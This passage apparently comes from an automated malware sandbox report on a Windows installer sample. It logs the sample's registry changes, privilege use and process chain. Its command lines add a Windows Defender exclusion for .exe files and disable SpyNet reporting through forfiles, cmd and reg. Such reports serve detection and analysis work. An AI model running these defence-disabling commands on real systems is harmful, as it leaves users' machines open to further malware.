Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDetectedUrl C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionTime = a02ecf142e33db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecision = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadNetworkName = "Network 3" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\f6-cc-c8-c8-ae-98 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

